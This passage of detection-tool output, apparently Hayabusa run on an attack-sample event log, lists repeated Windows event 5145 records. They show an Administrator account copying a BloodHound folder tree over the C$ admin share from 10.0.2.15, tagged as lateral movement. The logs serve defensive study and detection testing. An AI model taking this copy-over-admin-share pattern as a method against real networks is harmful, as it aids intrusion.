0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream | IP Addr: 10.0.2.15 | LID: 
